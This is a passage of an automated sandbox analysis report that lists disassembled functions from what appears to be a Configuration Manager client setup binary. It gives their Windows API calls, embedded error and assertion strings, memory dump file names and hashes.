                                                                                          • Instruction Fuzzy Hash: 215106B4A4524AEBDB01EB68DC89BFEBFB4FF54300F148058E541A72D2DB785A05DB60
                                                                                          Function 005930F2 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 111threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593117
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$GetSetupCommandLine(&pszaArgs, uNumArgs, sCommandLine, bCanExit)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$;!$Fl
                                                                                          • API String ID: 3276020833-1531629218
                                                                                          • Opcode ID: 2ac812af98e0f4e8f94e9cf7ca43a8a0e7dcb42606d029167f637ac9b49be4cf
                                                                                          • Instruction ID: 8f78ae10a8d132fa20c0413754bd3775ea29b80ac14617fdc664a9c1db9b749e
                                                                                          • Opcode Fuzzy Hash: 2ac812af98e0f4e8f94e9cf7ca43a8a0e7dcb42606d029167f637ac9b49be4cf
                                                                                          • Instruction Fuzzy Hash: FB41DB30A48358EAEF25EAA0CD5ABEEBF60AB51704F5004D9F6043B1C2DBB41F84CB51
                                                                                          Function 005944DC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 107threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005944FA
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ParseCommonSwitches(sArg, bValidArg, true)$ccmsetup.cpp$ccmsetup.cpp$;!$Fl
                                                                                          • API String ID: 3276020833-4143258054
                                                                                          • Opcode ID: 35afe25cd129cf57107c50803cb24dcd8a919850670d07a11ba50589cd88d02e
                                                                                          • Instruction ID: 97fdd2d74dc14c2ad919b815197d82b67d6c5f314d1a51d9a81041d2326f8235
                                                                                          • Opcode Fuzzy Hash: 35afe25cd129cf57107c50803cb24dcd8a919850670d07a11ba50589cd88d02e
                                                                                          • Instruction Fuzzy Hash: 9741DC31A44358EAEF25DAA0CD5ABEEBF64AB51704F6004DAF6056B1C2DBB02F44CB51
                                                                                          Function 00593D49 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 118threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593D80
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$Fl
                                                                                          • API String ID: 3276020833-1917738380
                                                                                          • Opcode ID: d28245efe4702522def5b3f799565e9fc5e15ee9efb59de976a9464db68a5c70
                                                                                          • Instruction ID: c35932e76d2d6340a81eb15776a513b250b32b170b2c10b888b01a04bff53584
                                                                                          • Opcode Fuzzy Hash: d28245efe4702522def5b3f799565e9fc5e15ee9efb59de976a9464db68a5c70
                                                                                          • Instruction Fuzzy Hash: 4041CC31A44358EAEF25DAA0CD5ABEDBB60AB51704F2044DAF2056B1C2DBB42F84CB51
                                                                                          Function 00593CD0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 115threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593D08
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$Fl
                                                                                          • API String ID: 3276020833-1917738380
                                                                                          • Opcode ID: 8bb7c367ddbefc0ea97dd670813be81a9f312c2818a37e25e6f56bdb4f293302
                                                                                          • Instruction ID: f8e339396ae6afc629fe3bee5cf95ec6f9d4784fd052230ab9666dee56116ccc
                                                                                          • Opcode Fuzzy Hash: 8bb7c367ddbefc0ea97dd670813be81a9f312c2818a37e25e6f56bdb4f293302
                                                                                          • Instruction Fuzzy Hash: AB419D30A44358EAEF25EAA0CD5ABEDBB60AB51704F5044DAF6056B1C2DBB42F84CB51
                                                                                          Function 005935EA Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 112threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059361C
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$Fl
                                                                                          • API String ID: 3276020833-1917738380
                                                                                          • Opcode ID: 94c18480f3b0469e02a9944bb9101803e169fec3e953acebf726261ef2748c0a
                                                                                          • Instruction ID: f6c59158710a626c3509dbed33ec333cd48eeefb2d395aca2f70d18435aa9638
                                                                                          • Opcode Fuzzy Hash: 94c18480f3b0469e02a9944bb9101803e169fec3e953acebf726261ef2748c0a
                                                                                          • Instruction Fuzzy Hash: 1341D930A44358EAEF25EAA0CD5ABEDBF60AB51704F5044CAB6053B1C2DBB11F84CB51
                                                                                          Function 00593DED Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593E1F
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$Fl
                                                                                          • API String ID: 3276020833-1917738380
                                                                                          • Opcode ID: eb5378dec337723bbc1b0a82d8fad5a987e72c650b662ac5596c67d66786c6fa
                                                                                          • Instruction ID: 945c85a97827383366b41c12b619deb039c1b5532f34f38a3fbc397304a1ee01
                                                                                          • Opcode Fuzzy Hash: eb5378dec337723bbc1b0a82d8fad5a987e72c650b662ac5596c67d66786c6fa
                                                                                          • Instruction Fuzzy Hash: 5F41CC30A44358EAEF25DAA0CE5ABEDBF60AB51704F5044CAF6057B1C2DBB51F84CB51
                                                                                          Function 00593E49 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593E79
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$m_statusInfoHandle != 0$Fl
                                                                                          • API String ID: 3276020833-3887944012
                                                                                          • Opcode ID: 9ab64559fd74171829acf1a11dc994af46f0af6e1a77a0fb3609032dd578e14e
                                                                                          • Instruction ID: a7458a0011abf2cc0aa83b71309c6982975977f74abddcd9c08435cd219e1927
                                                                                          • Opcode Fuzzy Hash: 9ab64559fd74171829acf1a11dc994af46f0af6e1a77a0fb3609032dd578e14e
                                                                                          • Instruction Fuzzy Hash: BB41DD30A84358EAEF25DAA0CD5ABEDBF60AB51704F6044CAF6057B1C2DBB42F44CB51
                                                                                          Function 00593EB6 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593EE6
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$this->m_statusInfo->StructSize == sizeof(CCMSetup::StatusInfo)$Fl
                                                                                          • API String ID: 3276020833-3806281912
                                                                                          • Opcode ID: 0398eb183c99f5edc49c1719ee2e3986ec973e5676c7721f77ddd59dee65ac98
                                                                                          • Instruction ID: 0d9fd13250d640e0fdd23aba23722ca254cc125c50a795ec084733b701e4e910
                                                                                          • Opcode Fuzzy Hash: 0398eb183c99f5edc49c1719ee2e3986ec973e5676c7721f77ddd59dee65ac98
                                                                                          • Instruction Fuzzy Hash: 9441DD30A44358EAEF25DAA0CE1ABEDBB60AB51704F6044CAF6057B1C2DBB52F44CB51
                                                                                          Function 00593F05 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593F35
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$this->m_statusInfo->Event != 0$Fl
                                                                                          • API String ID: 3276020833-2208013625
                                                                                          • Opcode ID: eb8ef8f1f2b4f4789fcbdc0a45cd0c6e0300d42b1a83649415f2898e1a97b3b5
                                                                                          • Instruction ID: 212eb000334bfa3b243e47fe4200eee9c6cb600efdce84dff71aa57adbc72279
                                                                                          • Opcode Fuzzy Hash: eb8ef8f1f2b4f4789fcbdc0a45cd0c6e0300d42b1a83649415f2898e1a97b3b5
                                                                                          • Instruction Fuzzy Hash: 0641DD30A44358EAEF25EAA0CD5BBEDBB60AB51704F6044CAF6057B1C2DBB42F44CB51
                                                                                          Function 00593F5A Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 108threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593F89
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ResetEvent(this->m_statusInfo->Event)$ccmsetup.cpp$ccmsetup.cpp$Fl
                                                                                          • API String ID: 3276020833-2115597616
                                                                                          • Opcode ID: 00ce2cb440ab1642422506a10cf27d24ed18dd8a132fca85259fcaa5a92c9595
                                                                                          • Instruction ID: c3c4583016809c72fa732aecd9a11a5a89c64b8f32bfed1bc158d9ddc7602ca2
                                                                                          • Opcode Fuzzy Hash: 00ce2cb440ab1642422506a10cf27d24ed18dd8a132fca85259fcaa5a92c9595
                                                                                          • Instruction Fuzzy Hash: 4A41DB30A44358EAEF25DAA0CD5ABEDBB60AB51704F2044CAF6057B1C2DBB52F84CB51
                                                                                          Function 00634534 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 102threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0063453B
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 006346B2: __EH_prolog3_catch_GS.LIBCMT ref: 006346B9
                                                                                            • Part of subcall function 006346B2: GetCurrentThreadId.KERNEL32 ref: 0063474B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006345E7
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006345E2
                                                                                          • Get SmsClientVersion from WMI succeed, xrefs: 00634636
                                                                                          • SMS::Utility::GetClientVersion, xrefs: 00634578
                                                                                          • ..\smsutil.cpp, xrefs: 006345D7
                                                                                          • GetClientVersionFromWMI(sClientVersion), xrefs: 006345DD
                                                                                          • ..\smsutil.cpp, xrefs: 006345EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentH_prolog3_catch_Thread$CloseH_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\smsutil.cpp$..\smsutil.cpp$Get SmsClientVersion from WMI succeed$GetClientVersionFromWMI(sClientVersion)$SMS::Utility::GetClientVersion
                                                                                          • API String ID: 4140803554-1927873256
                                                                                          • Opcode ID: f1d361f283c357ff09351cd816a760c413ac374975f765d5d7db49cfd62356e9
                                                                                          • Instruction ID: 3d0569a9b5c1062f79bb1b4fb6948c4a4fd87d7bf8ac9110abb66eb47a029a29
                                                                                          • Opcode Fuzzy Hash: f1d361f283c357ff09351cd816a760c413ac374975f765d5d7db49cfd62356e9
                                                                                          • Instruction Fuzzy Hash: D2419270C05289EADF15EBA4C95A6EDBF75AF52314F148089E1017B3D2CF781A05C796
                                                                                          Function 005B849A Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 61threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B84A1
                                                                                            • Part of subcall function 005AE2E1: __EH_prolog3_catch_GS.LIBCMT ref: 005AE2E8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B8526
                                                                                          Strings
                                                                                          • {252DA259-82CA-4177-B8D0-49C78937BA3E}, xrefs: 005B84C9
                                                                                          • util.cpp, xrefs: 005B852E
                                                                                          • GetProductInstalledByUpgradeCode( c_szClientUpgradeCode, bIsInstalled ), xrefs: 005B851C
                                                                                          • IsClientInstalled, xrefs: 005B84B1
                                                                                          • util.cpp, xrefs: 005B8516
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B8521
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
